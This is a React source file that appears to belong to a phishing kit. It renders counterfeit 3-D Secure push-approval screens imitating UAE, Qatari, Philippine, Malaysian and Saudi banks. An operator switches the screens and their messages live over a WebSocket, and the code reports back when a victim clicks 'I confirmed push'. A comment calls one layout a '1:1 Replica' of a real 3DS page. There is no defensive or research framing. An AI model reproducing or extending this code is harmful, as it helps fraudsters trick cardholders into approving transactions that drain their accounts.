import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { useWebSocket } from '../hooks/useWebSocket';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout, { isQatarBankDesign, QATAR_BANKS } from './qatar/QatarBankLayout';
import UaeBankLayout, { isUaeBankDesign } from './uae/UaeBankLayout';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import MalaysiaBankLayout, { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import KsaBankLayout, { isKsaBankDesign } from './ksa/KsaBankLayout';
import { getTranslation } from '../utils/i18n';
import { isMastercard } from '../utils/cardScheme';
import HelpImage from './assets/help.gif';

export default function PushPage({ config }) {
  const navigate = useNavigate();
  const handleCleanCancel = () => {
    sessionStorage.removeItem('rejected_card');
    const checkoutPath = localStorage.getItem('checkout_path') || '/';
    navigate(checkoutPath);
  };
  const mode = config?.mode || localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';
  const t = getTranslation(mode);
  const isRtl = t.dir === 'rtl';
  const [submitting, setSubmitting] = useState(false);

  const { sendResponse, currentCommand } = useWebSocket();
  const design = localStorage.getItem('session_design') || 'ph_bdo';
  const customMessage = currentCommand?.message || localStorage.getItem('push_text') || (isRtl ? 'يرجى فتح تطبيق البنك والموافقة على طلب تفويض المعاملة.' : 'Please approve the notification sent to your mobile banking app.');

  const isQatar = isQatarBankDesign(design);
  const bank = isQatar ? QATAR_BANKS[design] : null;
  const isMc = isMastercard(design);

  const isUae = isUaeBankDesign(design) || currentCommand?.type === 'show_bank_push' || Boolean(currentCommand?.bank);
  const uaeBank = currentCommand?.bank || (design.includes('fab') ? 'fab' : (design.includes('wio') ? 'wio' : 'adib'));

  const handleConfirm = (e) => {
    e?.preventDefault();
    if (submitting) return;
    setSubmitting(true);
    sendResponse('push_confirmed', {});
  };

  // 1. UAE Bank Branded Push (ADIB / WIO)
  if (isUae) {
    const isCustomPush = currentCommand?.type === 'show_bank_push' || currentCommand?.isCustomPush;
    return (
      <UaeBankLayout
        bank={uaeBank}
        scheme={isMc ? 'mastercard' : 'visa'}
        mode="push"
        customMessage={isCustomPush ? null : currentCommand?.message}
        onApprove={handleConfirm}
        onExit={() => navigate('/')}
      />
    );
  }

  // 1.5. Philippines Bank Branded Push (BDO, Landbank, Metrobank, etc.)
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 1.6. Malaysia Bank Branded Push (Maybank Secure2u, BIMB Secure, CIMB SecureTAC, AmBank, HSBC, Public Bank, RHB, Standard Chartered)
  if (isMalaysiaBankDesign(design)) {
    return (
      <MalaysiaBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 1.7. Qatar Bank Branded Design (Strictly for Qatar bank BINs)
  if (isQatar && bank) {
    return (
      <QatarBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 1.8. KSA (Saudi Arabia) Bank Branded Push
  if (isKsaBankDesign(design)) {
    return (
      <KsaBankLayout
        design={design}
        mode="push"
        customMessage={customMessage}
        onApprove={handleConfirm}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2. Standard 3DS Design (1:1 Replica of manual/providers/3ds/Push.jsx)
  return (
    <StandardCardLayout
      title={isRtl ? 'المصادقة عبر إشعار الدفع' : 'Push Authentication'}
      subtitle={customMessage}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <div style={{ display: 'flex', justifyContent: 'center', margin: '1.5rem 0' }}>
        <div className="cus-loader" />
      </div>

      <form onSubmit={handleConfirm}>
        <div className="scl-link-row">
          <a 
            href="#missing" 
            onClick={(e) => { e.preventDefault(); alert(isRtl ? 'يرجى فتح تطبيق البنك الخاص بك والتحقق من قسم الإشعارات المعلقة.' : 'Please open your banking app and check the pending approvals section.'); }}
            className="scl-link"
          >
            {isRtl ? 'لم تستلم الإشعار؟' : "Haven't received the push notification?"}
          </a>
        </div>

        <div className="scl-btn-bar">
          <button 
            type="button" 
            onClick={() => navigate('/')} 
            className="scl-cancel-btn"
          >
            {isRtl ? 'إلغاء' : 'Cancel'}
          </button>

          <button
            type="submit"
            disabled={submitting}
            className="scl-submit-btn"
          >
            {submitting ? <div className="inputLoader" /> : (isRtl ? 'لقد أكدت الإشعار' : 'I confirmed push')}
          </button>

          <button 
            type="button" 
            onClick={() => alert(isRtl ? 'للمساعدة، يرجى التواصل مع البنك المصدر لبطاقتك.' : 'For assistance, please contact your card issuing bank.')}
            className="scl-help-btn"
          >
            <img className="scl-help-icon" src={HelpImage} alt="" />
            {isRtl ? 'مساعدة' : 'Help'}
          </button>
        </div>
      </form>
    </StandardCardLayout>
  );
}

